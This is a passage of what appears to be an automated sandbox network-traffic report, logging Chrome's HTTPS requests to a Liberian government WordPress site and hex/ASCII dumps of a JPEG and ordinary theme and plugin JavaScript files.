                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC348INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 14:20:25 GMT
                                                                                                                        ETag: "9d83-60e9821cd9bb5"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 40323
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: User-Agent
                                                                                                                        Content-Type: image/jpeg
                                                                                                                        2025-01-10 13:54:50 UTC7844INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 19 bb 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 05 a0 00 00 01 01 00 03 00 00 00 01 04 38 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d3 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 31 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 34 3a 30 31 3a 31 30 20 31 34 3a
                                                                                                                        Data Ascii: JFIFHHExifMM*8(12i HHAdobe Photoshop 21.2 (Windows)2024:01:10 14:
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 31 30 45 34 31 39 39 34 45 31 33 38 46 39 43 38 31 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 6a 70 65 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 4c 65 67 61 63 79 49 50 54 43 44 69 67 65 73 74 3d 22 45 38 46 31 35 43 46 33 32 46 43 31 31 38 41 31 41 32 37 42 36 37 41 44 43 35 36 34 44 35 42 41 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 70 68 6f 74 6f 73 68 6f 70 3a 49 43 43 50 72 6f 66 69 6c 65 3d 22 75 52 47 42 22 20 78 6d 70 3a 43 72 65 61 74 65 44 61 74 65 3d 22 32 30 32 34 2d 30 31 2d 31 30 54 30 39 3a 35 32 3a 35 39 5a 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 34 2d 30 31 2d 31 30 54 31 34 3a 31 39 3a 33 33 5a 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 34 2d
                                                                                                                        Data Ascii: 10E41994E138F9C81" dc:format="image/jpeg" photoshop:LegacyIPTCDigest="E8F15CF32FC118A1A27B67ADC564D5BA" photoshop:ColorMode="3" photoshop:ICCProfile="uRGB" xmp:CreateDate="2024-01-10T09:52:59Z" xmp:ModifyDate="2024-01-10T14:19:33Z" xmp:MetadataDate="2024-
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 85 58 4d e2 32 4c f2 51 92 1d a3 91 d1 3c 3d 8e 2d 70 39 04 2d e9 d4 95 39 29 c1 e1 a3 49 d3 8c e2 e3 25 94 cb 45 ae e0 2b e1 c9 c0 95 bc 1c 3e f5 ee 78 6d fa ba a7 97 de 5c ff 00 93 c6 71 0b 27 6d 53 0b ba f9 19 ab a2 50 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 08 8a ca 8e 9e 43 83 e2 37 80 53 c2 38 44 52 79 31 d6 e6 a1 00 40 10 18 f7 08 3c 26 82 a6 1f ed 22 73 7d 60 ad 64 b2 9a 34 a8 b3 16 8d 1e 46 09 07 a9 73 4f 34 10 04 01 00 40 78 d3 70 6b e3 fe cd c4 0f 37 31 ec 2b 2f c4 92 a7 34 fc 4c eb 7d c6 6b 4d 5c 75 b4 ee dd 7c 47 3d c4 75 83 dc 91 6d 3c a3 14 a6 e1 25 28 9b 7b 4f df 29 ef f6 c8 6b 60 c3 4b 9a 3a 48 f3 93 1b b1 c4 15 d1 8c 94 96 51 e8 69 d4 8c d6 62 49 2d 89 0e 5a d2 f7 06 b4 64 93 80 16 01 71 b3 db 1b 6f a7 e2 01 99 fc
                                                                                                                        Data Ascii: XM2LQ<=-p9-9)I%E+>xm\q'mSP C7S8DRy1@<&"s}`d4FsO4@xpk71+/4L}kM\u|G=um<%({O)k`K:HQibI-Zdqo
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 6b bf 3f d2 ff 00 96 1f c4 e5 f5 2e 03 ee 25 e6 7c bb 88 7b c5 e4 51 e3 8a 49 5d bb 1b 1c f7 76 34 64 ae db 69 73 28 25 92 bf a9 29 e6 a6 b9 18 e7 89 f1 3f 71 a7 75 ed 20 e1 44 da 7b a3 a9 68 b1 4f 73 9d 33 4d 35 4d c1 cc 82 29 25 70 8c 92 d6 34 93 8c f7 22 92 5c c5 da cc 36 27 e4 8d f1 3b 76 46 39 8e 1d 4e 18 2a 54 d3 e4 72 cb d6 c8 3e 7a ad ff 00 2d ff 00 b8 2e 1f 1d f7 51 f3 fd 8e 87 0e ef bf 23 6c 2f 2a 76 0c cb 33 77 ee 74 e3 fc 59 f5 28 ea f7 19 b4 3b c5 5f 5c be 4d 39 75 ba 54 df 6c e2 e5 63 ac 70 9b a7 63 71 2c 24 37 1e 2b fa 88 c7 23 c0 af 41 c3 5c 6b d0 87 e1 ea 69 ab 05 cb a3 eb c8 e6 dc c6 50 aa d5 48 e6 12 7c fc 3e 66 a9 ba fe 1a d3 3b da df 43 6a a7 56 da 03 da d7 80 f0 c9 29 89 3c 23 9a 13 c0 8e ac e3 8a bb db 46 e9 fe 1a f2 18 97 d9 fc 53
                                                                                                                        Data Ascii: k?.%|{QI]v4dis(%)?qu D{hOs3M5M)%p4"\6';vF9N*Tr>z-.Q#l/*v3wtY(;_\M9uTlcpcq,$7+#A\kiPH|>f;CjV)<#FS
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: ff 00 2b 31 ef df 28 ca 4b 8d be 3a 2b 6d 35 d2 dc 30 7a 49 9b b8 5e 7b 00 f1 b8 0e d3 cd 58 b3 bc a1 4a 6e a5 58 6a f0 5d 08 6b f1 65 38 e9 86 51 09 a7 be 50 97 5b 0c a0 49 1c f7 2a 67 3b c7 8a a6 5e 20 76 b5 dc 48 3d dc 95 fb ee 21 c3 ee 16 61 49 c6 5f 0c 7e 85 7b 6e 29 52 93 f6 9e 51 77 1f 2a 4d 3d d7 62 ba ff 00 e6 8f ff 00 e9 70 bb 54 74 7d 77 4b f2 b3 1e 9f e5 35 60 8a aa a6 67 59 2e 84 4a 5b 80 0c 7c 30 3e d2 de 55 d3 8a 58 e4 69 1e 33 4d 36 f4 b2 9b b4 3d a4 e8 7d 73 48 e7 47 66 bb db 2e 2d 70 92 3a b8 3a 3f 2c 72 2e 1b dc 7c fc 0f 7a e9 d9 71 ca b6 eb 43 f6 a3 e0 ff 00 62 19 f1 1b 79 4b 5a 83 4f e4 6b 7d 41 a9 af 7a a1 94 6d bc 57 1a c7 51 46 62 8a 49 1a 37 f7 49 cf 8c ec 65 de 9c ae 9d 0e 3d 69 41 be ce 9b 59 ff 00 7c 4d 65 c5 23 2e 69 9b 7e c7
                                                                                                                        Data Ascii: +1(K:+m50zI^{XJnXj]ke8QP[I*g;^ vH=!aI_~{n)RQw*M=bpTt}wK5`gY.J[|0>UXi3M6=}sHGf.-p::?,r.|zqCbyKZOk}AzmWQFbI7Ie=iAY|Me#.i~
                                                                                                                        2025-01-10 13:54:50 UTC479INData Raw: c6 79 06 5f e8 fa a3 cc bc e5 e7 13 ad 72 f1 27 85 e0 75 28 5a 42 97 2e 65 a5 ac 6b 06 1a 00 0b 9c 5a 3b 2c 19 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 08 02 00 80 20 3a 4d 0c 73 c4 f8 a6 8d 92 46 f1 ba e6 3c 64 38 76 10 b2 9b 4f 28 c1 50 93 67 6f b7 4a f9 b4 a5 fe e3 a7 8b 8e f1 a6 88 89 a9 49 fd 93 f8 0f 41 0a fa bf d4 b1 5e 0a 5f 1e 4f ea 8d 34 63 ba f0 72 28 36 9d 18 e8 c6 ac b2 ca df af 25 b4 87 7a 83 b0 b3 da 59 73 ec df d4 62 7e 27 8c da 1b 50 5f 01 66 a5 d6 15 75 b4 e7 ca a4 a4 88 52 c4 f1 d8 ed df 19 c3 d2 b2 af 29 53 f7 34 d2 7e 2f 76 63 44 9f 36 59 6d 5a 7a df 67 a7 8e 9e 92 9d 8c 8e 21 86 35 ad c3 5b e6 0a 95 4a d3 a8 dc a4 f7 36 50 48 92 51 1b 84 01 00 40 10 04 07 18 40 72 80 20 08 02 00 80 20
                                                                                                                        Data Ascii: y_r'u(ZB.ekZ;, :MsF<d8vO(PgoJIA^_O4cr(6%zYsb~'P_fuR)S4~/vcD6YmZzg!5[J6PHQ@@r


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        55192.168.2.74985269.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC508OUTGET /wp-content/themes/betheme/js/plugins/debouncedresize.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC366INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "1d8-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 472
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:50 UTC472INData Raw: 2f 2a 2a 0a 20 2a 20 52 65 73 69 7a 65 0a 20 2a 20 64 65 62 6f 75 6e 63 65 64 72 65 73 69 7a 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6c 6f 75 69 73 72 65 6d 69 2f 6a 71 75 65 72 79 2d 73 6d 61 72 74 72 65 73 69 7a 65 20 7c 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 65 76 65 6e 74 2c 6e 2c 72 3b 6e 3d 74 2e 73 70 65 63 69 61 6c 2e 64 65 62 6f 75 6e 63 65 64 72 65 73 69 7a 65 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 74 68 69 73 29 2e 6f 6e 28 22 72 65 73 69 7a 65 22 2c 6e 2e 68 61 6e 64 6c 65 72 29 7d 2c 74 65 61 72 64 6f 77 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 74 68
                                                                                                                        Data Ascii: /** * Resize * debouncedresize * https://github.com/louisremi/jquery-smartresize | Licensed under the MIT license. */(function(e){var t=e.event,n,r;n=t.special.debouncedresize={setup:function(){e(this).on("resize",n.handler)},teardown:function(){e(th


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        56192.168.2.74985069.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC506OUTGET /wp-content/themes/betheme/js/plugins/magnificpopup.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "4f10-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 20240
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:50 UTC7823INData Raw: 2f 2a 2a 0a 20 2a 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 0a 20 2a 20 31 2e 31 2e 30 20 7c 20 44 6d 69 74 72 79 20 53 65 6d 65 6e 6f 76 20 7c 20 4d 49 54 20 7c 20 68 74 74 70 3a 2f 2f 64 69 6d 73 65 6d 65 6e 6f 76 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2f 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 79 70 65 6f 66 20 64 65 66 69 6e 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 61 29 3a 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3d 3d 22 6f 62 6a 65 63 74 22 3f 61 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 61 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 7c 7c 77 69 6e 64 6f 77 2e 5a 65 70 74 6f 29 7d
                                                                                                                        Data Ascii: /** * Magnific Popup * 1.1.0 | Dmitry Semenov | MIT | http://dimsemenov.com/plugins/magnific-popup/ */(function(a){typeof define=="function"&&define.amd?define(["jquery"],a):typeof exports=="object"?a(require("jquery")):a(window.jQuery||window.Zepto)}
                                                                                                                        2025-01-10 13:54:50 UTC8000INData Raw: 6f 6e 28 61 29 7b 6e 2e 62 67 4f 76 65 72 6c 61 79 2e 61 64 64 43 6c 61 73 73 28 61 29 2c 6e 2e 77 72 61 70 2e 61 64 64 43 6c 61 73 73 28 61 29 7d 2c 5f 72 65 6d 6f 76 65 43 6c 61 73 73 46 72 6f 6d 4d 46 50 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 62 67 4f 76 65 72 6c 61 79 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 61 29 2c 6e 2e 77 72 61 70 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 61 29 7d 2c 5f 68 61 73 53 63 72 6f 6c 6c 42 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 6e 2e 69 73 49 45 37 3f 73 2e 68 65 69 67 68 74 28 29 3a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 29 3e 28 61 7c 7c 72 2e 68 65 69 67 68 74 28 29 29 7d 2c 5f 73 65 74 46 6f 63 75 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6e
                                                                                                                        Data Ascii: on(a){n.bgOverlay.addClass(a),n.wrap.addClass(a)},_removeClassFromMFP:function(a){this.bgOverlay.removeClass(a),n.wrap.removeClass(a)},_hasScrollBar:function(a){return(n.isIE7?s.height():document.body.scrollHeight)>(a||r.height())},_setFocus:function(){(n
                                                                                                                        2025-01-10 13:54:50 UTC4417INData Raw: 67 65 22 7d 2c 5f 67 65 74 49 74 65 6d 54 6f 5a 6f 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 63 75 72 72 49 74 65 6d 2e 68 61 73 53 69 7a 65 3f 6e 2e 63 75 72 72 49 74 65 6d 2e 69 6d 67 3a 21 31 7d 2c 5f 67 65 74 4f 66 66 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3b 62 3f 63 3d 6e 2e 63 75 72 72 49 74 65 6d 2e 69 6d 67 3a 63 3d 6e 2e 73 74 2e 7a 6f 6f 6d 2e 6f 70 65 6e 65 72 28 6e 2e 63 75 72 72 49 74 65 6d 2e 65 6c 7c 7c 6e 2e 63 75 72 72 49 74 65 6d 29 3b 76 61 72 20 64 3d 63 2e 6f 66 66 73 65 74 28 29 2c 65 3d 70 61 72 73 65 49 6e 74 28 63 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 74 6f 70 22 29 2c 31 30 29 2c 66 3d 70 61 72 73 65 49 6e 74 28 63 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d
                                                                                                                        Data Ascii: ge"},_getItemToZoom:function(){return n.currItem.hasSize?n.currItem.img:!1},_getOffset:function(b){var c;b?c=n.currItem.img:c=n.st.zoom.opener(n.currItem.el||n.currItem);var d=c.offset(),e=parseInt(c.css("padding-top"),10),f=parseInt(c.css("padding-bottom


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        57192.168.2.74985169.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC485OUTGET /wp-content/themes/betheme/js/menu.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "b2b-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2859
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:50 UTC2859INData Raw: 2f 2a 2a 0a 20 2a 20 4d 75 66 66 69 6e 4d 65 6e 75 0a 20 2a 0a 20 2a 20 48 6f 72 69 7a 6f 6e 74 61 6c 20 4d 75 6c 74 69 6c 65 76 65 6c 20 4d 65 6e 75 20 77 69 74 68 20 57 50 20 4d 65 67 61 4d 65 6e 75 20 53 75 70 70 6f 72 74 0a 20 2a 20 33 2e 30 20 7c 20 4d 75 66 66 69 6e 20 47 72 6f 75 70 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 0a 09 2f 2a 20 67 6c 6f 62 61 6c 73 20 6a 51 75 65 72 79 20 2a 2f 0a 0a 20 20 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 0a 20 20 24 2e 66 6e 2e 6d 66 6e 4d 65 6e 75 20 3d 20 66 75 6e 63 74 69 6f 6e 28 6f 70 74 69 6f 6e 73 29 20 7b 0a 0a 20 20 20 20 76 61 72 20 6d 65 6e 75 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 20 20 20 20 76 61 72 20 64 65 66 61 75 6c 74 73 20 3d 20 7b 0a 20 20 20 20 20 20 61 64 64 4c 61 73
                                                                                                                        Data Ascii: /** * MuffinMenu * * Horizontal Multilevel Menu with WP MegaMenu Support * 3.0 | Muffin Group */(function($) {/* globals jQuery */ "use strict"; $.fn.mfnMenu = function(options) { var menu = $(this); var defaults = { addLas


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        58192.168.2.74985969.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC500OUTGET /wp-content/themes/betheme/js/plugins/visible.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC366INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "260-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 608
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:50 UTC608INData Raw: 2f 2a 2a 0a 20 2a 20 56 69 73 69 62 6c 65 0a 20 2a 20 72 65 71 75 69 72 65 64 20 66 6f 72 3a 20 4f 6e 65 20 50 61 67 65 20 41 63 74 69 76 65 0a 20 2a 20 53 61 6d 20 53 65 68 6e 65 72 74 2c 20 73 61 6d 61 74 64 66 2c 20 54 65 61 6d 44 46 20 7c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 65 61 6d 64 66 2f 6a 71 75 65 72 79 2d 76 69 73 69 62 6c 65 2f 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 66 6e 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 72 29 7b 76 61 72 20 69 3d 65 28 74 68 69 73 29 2e 65 71 28 30 29 2c 73 3d 69 2e 67 65 74 28 30 29 2c 6f 3d 65 28 77 69 6e 64 6f 77 29 2c 75 3d 6f 2e 73 63 72 6f 6c 6c 54 6f 70 28 29 2c 61 3d 75 2b 6f 2e 68 65 69 67 68 74 28 29 2c 66 3d 6f 2e 73 63 72 6f 6c 6c 4c
                                                                                                                        Data Ascii: /** * Visible * required for: One Page Active * Sam Sehnert, samatdf, TeamDF | https://github.com/teamdf/jquery-visible/ */(function(e){e.fn.visible=function(t,n,r){var i=e(this).eq(0),s=i.get(0),o=e(window),u=o.scrollTop(),a=u+o.height(),f=o.scrollL


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        59192.168.2.74986069.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC510OUTGET /wp-content/themes/betheme/assets/animations/animations.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
                                                                                                                        2025-01-10 13:54:50 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:50 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "726-60e9383bc7b56"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 1830
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:50 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:50 UTC1830INData Raw: 2f 2a 2a 0a 20 2a 20 41 6e 69 6d 61 74 69 6f 6e 73 20 76 31 2e 34 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2c 20 4a 6f 65 20 4d 6f 74 74 65 72 73 68 61 77 2c 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 6f 65 6d 6f 74 74 65 72 73 68 61 77 2f 0a 20 2a 2f 0a 0a 66 75 6e 63 74 69 6f 6e 20 61 6e 69 6d 61 74 65 45 6c 65 6d 65 6e 74 28 29 7b 6a 51 75 65 72 79 28 22 2e 61 6e 69 6d 61 74 65 22 29 2e 65 61 63 68 28 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 77 69 64 74 68 28 29 3e 3d 39 36 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 6e 29 7b 76 61 72 20 6e 3d 6a 51 75 65 72 79 28 6e 29 2c 69 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 61 6e 69 6d 2d 74 79 70 65 22 29 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73
                                                                                                                        Data Ascii: /** * Animations v1.4 * Copyright 2014, Joe Mottershaw, https://github.com/joemottershaw/ */function animateElement(){jQuery(".animate").each(jQuery(window).width()>=96?function(a,n){var n=jQuery(n),i=jQuery(this).attr("data-anim-type"),t=jQuery(this


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        60192.168.2.74986269.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:50 UTC684OUTGET /wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.13 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
